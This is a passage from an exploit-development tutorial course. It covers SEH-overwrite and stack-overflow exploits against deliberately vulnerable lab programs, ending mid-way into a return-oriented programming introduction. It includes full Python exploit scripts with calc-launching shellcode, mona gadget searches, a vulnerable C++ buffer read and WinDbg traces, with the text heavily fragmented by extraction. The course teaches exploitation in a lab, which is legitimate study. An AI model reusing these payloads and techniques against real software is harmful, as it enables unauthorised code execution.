x06
\
x90
\
x90'
 
    
handl
er
 
=
 
'
\
x5d
\
xd7
\
xdf
\
x75'
 
    
shellcode
 
=
 
(
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
x
b4
\
x7b
\
xe8"
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
+
 
   
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
+
 
            
"
\
x56
\
x
57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
+
 
            
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
+
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x
74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
+
 
            
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x
74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x
88
\
x8b
\
x04"
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
    
data
 
=
 
'a'
*
84
 
+
 
jmp
 
+
 
handler
 
+
 
shellcode
 
    
f
.
write
(
data
 
+
 
'c'
 
*
 
(
10000
 
-
 
len
(
data
)))
 
 
If you debug 
exploitme2.exe
 in WinDbg you’ll see that there’s something wrong. It seems that our handler 
(
pop/pop/
ret
) is not called. Why?
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 123 
-
 
Let’s have a look at the loaded modules:
 
0:000> !py mona modules
 
Hold on...
 
[+] Command used:
 
!py mona.py modules
 
 
----------
 Mona command started on 2015
-
03
-
19 00:31:14 (v2.0, rev 554) 
----------
 
[+] Processing arguments and crite
ria
 
    
-
 Pointer access level : X
 
[+] Generating module info table, hang on...
 
    
-
 Processing modules
 
    
-
 Done. Let's rock 'n roll.
 
-----------------------------------------------------------------------------------------------------------------------
-----------
 
 Module info :
 
----------------------------------------------------------------------------------------------------------------------------------
 
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Mo
dulename & Path
 
----------------------------------------------------------------------------------------------------------------------------------
 
 0x774b0000 | 0x774ba000 | 0x0000a000 | False  | True    | True  |  True    | True   | 6.1.7601.18768 [LPK.dl
l] (C:
\
Windows
\
s
yswow64
\
LPK.dll)
 
 0x00190000 | 0x00196000 | 0x00006000 | False  | True    | True  |  False   | False  | 
-
1.0
-
 [exploitme2.exe] (exploitme2.exe)
 
 0x752d0000 | 0x7532a000 | 0x0005a000 | False  | True    | True  |  True    | True   | 8.0.0.434
4 [guard32.dll] (C:
\
Windows
\
S
ysWOW64
\
guard32.dll)
 
 0x764c0000 | 0x7658c000 | 0x000cc000 | False  | True    | True  |  True    | True   | 6.1.7601.18731 [MSCTF.dll] (C:
\
Window
s
\
syswow64
\
MSCTF.dll)
 
 0x76360000 | 0x763a7000 | 0x00047000 | False  | True    | T
rue  |  True    | True   | 6.1.7601.18409 [KERNELBASE.dll] (C:
\
Windows
\
syswow64
\
KERNELBASE.dll)
 
 0x752c0000 | 0x752c9000 | 0x00009000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [VERSION.dll] (C:
\
Wind
ows
\
SysWOW64
\
VERSION.dll)
 
 0x752b000
0 | 0x752b7000 | 0x00007000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [fltlib.dll] (C:
\
Windows
\
S
ysWOW64
\
fltlib.dll)
 
 0x758c0000 | 0x7595d000 | 0x0009d000 | False  | True    | True  |  True    | True   | 1.626.7601.18454 [USP10.dll] (C
:
\
Wind
ows
\
syswow64
\
USP10.dll)
 
 0x75b50000 | 0x75be0000 | 0x00090000 | False  | True    | True  |  True    | True   | 6.1.7601.18577 [GDI32.dll] (C:
\
Window
s
\
syswow64
\
GDI32.dll)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 124 
-
 
 0x75dc0000 | 0x75ed0000 | 0x00110000 | False  | True    | True  |  True    | Tr
ue   | 6.1.7601.18409 [kernel32.dll] (C:
\
Windo
ws
\
syswow64
\
kernel32.dll)
 
 0x75960000 | 0x75a0c000 | 0x000ac000 | False  | True    | True  |  True    | True   | 7.0.7601.17744 [msvcrt.dll] (C:
\
Window
s
\
syswow64
\
msvcrt.dll)
 
 0x75550000 | 0x7555c000 | 0x0000c00
0 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [CRYPTBASE.dll] (C:
\
Windows
\
syswow64
\
CRYPTBASE.dll)
 
 0x75560000 | 0x755c0000 | 0x00060000 | False  | True    | True  |  True    | True   | 6.1.7601.18779 [SspiCli.dll] (C:
\
Window
s
\
syswow64
\
S
spiCli.dll)
 
 0x77bd0000 | 0x77d50000 | 0x00180000 | False  | True    | True  |  True    | True   | 6.1.7601.18247 [ntdll.dll] (ntdll.dll)
 
 0x75ed0000 | 0x75f70000 | 0x000a0000 | False  | True    | True  |  True    | True   | 6.1.7601.18247 [ADVAPI32.dll] (
C:
\
Wind
ows
\
syswow64
\
ADVAPI32.dll)
 
 0x77660000 | 0x77750000 | 0x000f0000 | False  | True    | True  |  True    | True   | 6.1.7601.18532 [RPCRT4.dll] (C:
\
Windo
ws
\
syswow64
\
RPCRT4.dll)
 
 0x6d510000 | 0x6d5fe000 | 0x000ee000 | False  | True    | True  |  True  
  | True   | 12.0.21005.1 [MSVCR120.dll] (C:
\
Windo
ws
\
SysWOW64
\
MSVCR120.dll)
 
 0x764a0000 | 0x764b9000 | 0x00019000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [sechost.dll] (C:
\
Windo
ws
\
SysWOW64
\
sechost.dll)
 
 0x75ab0000 | 0x75ab5000 | 0x0
0005000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [PSAPI.DLL] (C:
\
Windo
ws
\
syswow64
\
PSAPI.DLL)
 
 0x761c0000 | 0x762c0000 | 0x00100000 | False  | True    | True  |  True    | True   | 6.1.7601.17514 [USER32.dll] (C:
\
Windo
ws
\
syswow64
\
USER
32.dll)
 
 0x762f0000 | 0x76350000 | 0x00060000 | False  | True    | True  |  True    | True   | 6.1.7601.17514 [IMM32.DLL] (C:
\
Windo
ws
\
SysWOW64
\
IMM32.DLL)
 
------------------------------------------------------------------------------------------------------
----------------------------
 
 
[+] This mona.py action took 0:00:00.110000
 
Here we can see that all the loaded modules have 
SafeSEH = True
. This is bad news for us. If a module is 
compiled with 
SafeSEH
, then it contains a list of the allowed SEH handlers a
nd any handler whose address 
is contained in that module but not in the list is ignored.
 
The address 0x75dfd75d is in the module 
kernel32.dll
 but not in the list of its allowed handlers so we can’t 
use it. The common solution is to choose a module with 
Saf
eSEH = False
, but in our case all the modules 
were compiled with SafeSEH enabled.
 
Since we’re just learning to walk here, let’s recompile 
exploitme2.exe
 without SafeSEH by changing the 
configuration in VS 2013 as follows:
 

 
Configuration Properties
 
o
 
Linker
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 125 
-
 

 
Ad
vanced
 

 
Image Has Safe Exception Handlers: No (/SAFESEH:NO)
 
Now let’s find a 
pop/pop/ret
 sequence inside 
exploitme2.exe
:
 
0:000> !py mona findwild 
-
s "pop r32#pop r32#ret" 
-
m exploitme2.exe
 
Hold on...
 
[+] Command used:
 
!py mona.py findwild 
-
s pop r32#pop r32
#ret 
-
m exploitme2.exe
 
 
----------
 Mona command started on 2015
-
03
-
19 00:53:54 (v2.0, rev 554) 
----------
 
[+] Processing arguments and criteria
 
    
-
 Pointer access level : X
 
    
-
 Only querying modules exploitme2.exe
 
[+] Type of search: str
 
[+] Searching 
for matches up to 8 instructions deep
 
[+] Generating module info table, hang on...
 
    
-
 Processing modules
 
    
-
 Done. Let's rock 'n roll.
 
[+] Started search (8 start patterns)
 
[+] Searching startpattern between 0x00e90000 and 0x00e96000
 
[+] Preparing out
put file 'findwild.txt'
 
    
-
 (Re)setting logfile findwild.txt
 
[+] Writing results to findwild.txt
 
    
-
 Number of pointers of type 'pop eax # pop esi # retn' : 1
 
    
-
 Number of pointers of type 'pop ecx # pop ecx # retn' : 1
 
    
-
 Number of pointers of t
ype 'pop edi # pop esi # retn' : 2
 
    
-
 Number of pointers of type 'pop ecx # pop ebp # retn' : 1
 
    
-
 Number of pointers of type 'pop ebx # pop ebp # retn' : 1
 
[+] Results :
 
0x00e91802 |   0x00e91802 (b+0x00001802)  : pop eax # pop esi # retn | startnul
l {PAGE_EXECUTE_READ} [exploitme2.e
xe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v
-
1.0
-
 (exploitme2.exe)
 
0x00e9152f |   0x00e9152f (b+0x0000152f)  : pop ecx # pop ecx # retn | startnull {PAGE_EXECUTE_READ} [exploitme2.ex
e] ASLR: True, Rebase: F
alse, SafeSEH: False, OS: False, v
-
1.0
-
 (exploitme2.exe)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 126 
-
 
0x00e918e7 |   0x00e918e7 (b+0x000018e7)  : pop edi # pop esi # retn | startnull {PAGE_EXECUTE_READ} [exploitme2.e
xe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v
-
1.0
-
 (exploitme2.exe)
 
0x0
0e91907 |   0x00e91907 (b+0x00001907)  : pop edi # pop esi # retn | startnull {PAGE_EXECUTE_READ} [exploitme2.e
xe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v
-
1.0
-
 (exploitme2.exe)
 
0x00e9112b |   0x00e9112b (b+0x0000112b)  : pop ecx # pop ebp #
 retn | startnull {PAGE_EXECUTE_READ} [exploitme2.
exe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v
-
1.0
-
 (exploitme2.exe)
 
0x00e91630 |   0x00e91630 (b+0x00001630)  : pop ebx # pop ebp # retn | startnull {PAGE_EXECUTE_READ} [exploitme2.
exe] ASLR:
 True, Rebase: False, SafeSEH: False, OS: False, v
-
1.0
-
 (exploitme2.exe)
 
    Found a total of 6 pointers
 
 
[+] This mona.py action took 0:00:00.170000
 
We’ll use the first address: 0x00e91802.
 
Here’s the updated Python script:
 
Python
 
 
with
 
open
(
'c:
\
\
name.dat
'
,
 
'wb'
)
 
as
 
f
:
 
    
jmp
 
=
 
'
\
xeb
\
x06
\
x90
\
x90'
 
    
handler
 
=
 
'
\
x02
\
x18
\
xe9
\
x00'
 
    
shellcode
 
=
 
(
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
+
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
+
 
            
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
+
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
+
 
            
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
    
data
 
=
 
'a'
*
84
 
+
 
jmp
 
+
 
handler
 
+
 
shellcode
 
    
f
.
write
(
data
 
+
 
'c'
 
*
 
(
10000
 
-
 
len
(
data
)))
 
 
Run the script and open 
exploitme2.exe
 (the version without S
afeSEH) in WinDbg. Now, as we expected, 
the calculator pops up! We did it, but we cheated a little bit. Also we’re pretending there’s no 
ASLR 
(for now).
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 127 
-
 
Troubleshooting
 
If the exploit doesn’t work on your system, it might be because of limited space on the
 stack. Read the 
article 
More space on the stack
.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 128 
-
 
Exploitme3 (DEP)
 
 
These articles are better read in order because they’re part of a full course. I assume that you know the 
material in 
Exploitme1
 and 
Exploitme2
.
 
This article is not easy to digest so take your time. I tried to be brief because I don’t believe in repeating 
things many times. If you understand the principles behind 
ROP
, then you can work 
out how everything 
works by yourself. After all, that’s exactly what I did when I studied ROP for the first time. Also, you must be 
very comfortable with assembly. What does 
RET 0x4
 do exactly? How are arguments passed to functions 
(in 32
-
bit code)? If you
’re unsure about any of these points, you need to go back to study assembly. You’ve 
been warned!
 
Let’s get started...
 
First of all, in 
VS 2013
, we’ll disable 
stack cookies
, but leave 
DEP
 on, by going to 
Project
→
properties
, and 
modifying the configuration for 
Release
 as follows:
 

 
Configuration Properties
 
o
 
C/C++
 

 
Code Generation
 

 
Security Check
: Disable Security Check (/GS
-
)
 
Make sure that DEP is activated:
 

 
Configuration Properties
 
o
 
Linker
 

 
Advanced
 

 
Data Execution Preve
ntion (DEP)
: Yes (/NXCOMPAT)
 
We’ll use the same code as before:
 
C++
 
 
#include <cstdio>
 
 
int
 
main
()
 
{
 
    
char
 
name
[
32
];
 
    
printf
(
"Reading name from file...
\
n"
);
 
 
FILE
 
*
f
 
=
 
fopen
(
"c:
\
\
name.dat"
,
 
"rb"
);
 
    
if
 
(!
f
)
 
        
return
 
-
1
;
 
    
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
    
long
 
bytes
 
=
 
ftell
(
f
);
 
    
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
    
fread
(
name
,
 
1
,
 
bytes
,
 
f
);
 
    
name
[
bytes
]
 
=
 
'
\
0'
;
 
    
fclose
(
f
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 129 
-
 
 
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
return
 
0
;
 
}
 
 
Let’s generate 
name.dat
 with the 
Python
 script we used for 
exploitme1.
exe
:
 
Python
 
 
with
 
open
(
'c:
\
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
ret_eip
 
=
 
'
\
x80
\
xa9
\
xe1
\
x75'
       
# "push esp / ret" in kernel32.dll
 
    
shellcode
 
=
 
(
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
+
 
          
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8
a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
+
 
          
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
+
 
          
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
+
 
          
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
+
 
          
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
+
 
          
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
+
 
          
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
+
 
          
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
+
 
          
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
+
 
          
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
+
 
          
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8
b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
+
 
          
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
+
 
          
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
+
 
          
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
+
 
          
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
+
 
          
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
+
 
          
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
+
 
          
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
+
 
          
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
    
name
 
=
 
'a'
*
36
 
+
 
ret_eip
 
+
 
shellcode
 
    
f
.
write
(
name
)
 
 
Note that I had to change 
ret_eip
 because I rebooted Windows. Remember that the comma
nd to find a 
JMP 
ESP
 instruction or equivalent code in 
kernel32.dll
 is
 
!py mona jmp 
-
r esp 
-
m kernel32.dll
 
If you run 
exploitme3.exe
 with DEP disabled, the exploit will work, but with DEP enabled the following 
exception is generated:
 
(1ee8.c3c): Access vio
lation 
-
 code c0000005 (first chance)
 
First chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=6d593071 edx=005a556b esi=00000001 edi=00000000
 
eip=002ef788 esp=002ef788 eb
p=61616161 iopl=0         nv up ei pl zr na pe nc
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 130 
-
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
002ef788 e8ffffffff      call    002ef78c
 
Note that 
EIP = ESP
, so we just jumped to 
ESP
, but something went wrong. If we disasse
mble the code at 
EIP
, we see that it’s indeed our shellcode:
 
0:000> u eip
 
002ef788 e8ffffffff      call    002ef78c
 
002ef78d c05fb911        rcr     byte ptr [edi
-
47h],11h
 
002ef791 0302            add     eax,dword ptr [edx]
 
002ef793 0281f1020202    add   
  al,byte ptr [ecx+20202F1h]
 
002ef799 0283c71d33f6    add     al,byte ptr [ebx
-
9CCE239h]
 
002ef79f fc              cld
 
002ef7a0 8a07            mov     al,byte ptr [edi]
 
002ef7a2 3c02            cmp     al,2
 
Here’s a portion of our shellcode (see the Python
 script above):
 
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02
 
As you can see, the bytes match.
 
So what’s wrong? The problem is that the page which contains this code is marked as 
non executable
.
 
Here’s what you’ll see when the page is 
ex
ecutable
:
 
0:000> !vprot @eip
 
BaseAddress:       77c71000
 
AllocationBase:    77bd0000
 
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
 
RegionSize:        00045000
 
State:             00001000  MEM_COMMIT
 
Protect:           00000020  PAGE_EXECUTE_READ
 
Type
:              01000000  MEM_IMAGE
 
The most important line is
 
Protect:           00000020  PAGE_EXECUTE_READ
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 131 
-
 
which means that the page is 
readonly
 and 
executable
.
 
In our case, after the exception, we see something different:
 
0:000> !vprot @eip
 
BaseAddress:
       0028f000
 
AllocationBase:    00190000
 
AllocationProtect: 00000004  PAGE_READWRITE
 
RegionSize:        00001000
 
State:             00001000  MEM_COMMIT
 
Protect:           00000004  PAGE_READWRITE
 
Type:              00020000  MEM_PRIVATE
 
The page is 
rea
dable
 and 
writable
 but not 
executable
.
 
Simply put, 
DEP
 (
D
ata 
E
xecution 
P
revention) marks all the pages containing data as 
non
-
executable
. This 
includes 
stack
 and 
heap
. The solution is simple: don’t execute code on the stack!
 
The technique to do that is cal
led 
ROP
 which stands for 
R
eturn
-
O
riented 
P
rogramming. The idea is simple:
 
1
.
 
reuse pieces of code already present in the modules
 
2
.
 
use the stack only to control data and the flow of execution
 
Consider the following three pieces of code:
 
Assembly (x86)
 
 
piece1
:
 
   
pop
    
eax
 
   
pop
    
ebx
 
   
ret
 
 
piece2
:
   
 
mov
    
ecx
,
 
4
 
   
ret
 
 
piece3
:
 
   
pop
    
edx
 
   
ret
 
 
piece1
, 
piece2
 and 
piece3
 are three labels and represent addresses in memory. We’ll use them instead of 
the real addresses for convenience.
 
Now let’s pu
t the following values on the stack:
 
esp 
--
> value_for_eax
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 132 
-
 
        value_for_ebx
 
        piece2
 
        piece3
 
        value_for_edx
 
If in the beginning 
EIP = piece1
 and we let the code run, here’s what will happen:
 
 
The schema should be clear, but let’s examine it step by step:
 
1
.
 
The execution starts at 
piece1
 and 
esp
 points to 
value_for_eax
.
 
2
.
 
pop eax
 puts 
value_for_eax
 into 
eax
 (
esp +=
 4
: now 
esp
 points to 
values_for_ebx
).
 
3
.
 
pop ebx
 puts 
value_for_ebx
 into 
ebx
 (
esp += 4
: now 
esp
 points to 
piece2
).
 
4
.
 
ret
 pops 
piece2
 and jumps to 
piece2
 (
esp += 4
: now 
esp
 points to 
piece3
).
 
5
.
 
mov ecx, 4
 puts 4 into 
ecx
.
 
6
.
 
ret
 pops 
piece3
 and jumps to 
piece3
 (
esp 
+= 4
: now 
esp
 points to 
value_for_edx
).
 
7
.
 
pop edx
 puts 
value_for_edx
 into 
edx
 (
esp += 4
: now 
esp
 points to 
some_function
).
 
8
.
 
ret
 pops 
some_function
 and jumps to 
some_function
.
 
We assume that 
some_function
 never returns.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 13
3 
-
 
By now it should be clear why this techn
ique is called ROP: the instruction 
RET
 is used to jump from one 
piece of code to the next. The pieces of code are usually called 
gadgets
. A gadget is just a sequence of 
instructions which ends with a 
RET
 instruction.
 
The hard part is finding and chaining 
together the right gadgets to achieve our goals.
 
Calling WinExec directly
 
For our exploit we want to execute what follows:
 
C++
 
 
WinExec
(
"calc.exe"
,
 
SW_SHOW
);
 
ExitThread
(
0
);
 
 
Here’s the corresponding code in assembly:
 
    WinExec("calc.exe", SW_SHOW);
 
00361
000 6A 05                push        5  
 
00361002 68 00 21 36 00       push        362100h  
 
00361007 FF 15 04 20 36 00    call        dword ptr ds:[362004h]  
 
    ExitThread(0);
 
0036100D 6A 00                push        0  
 
0036100F FF 15 00 20 36 00    c
all        dword ptr ds:[362000h]
 
One important thing that we note is that 
WinExec()
 and 
ExitThread()
 remove the arguments from the stack 
on their own (by using 
ret 8
 and 
ret 4
, respectively).
 
362100h
 is the address of the string 
calc.exe
 located in the 
.r
data
 section. We’ll need to put the string 
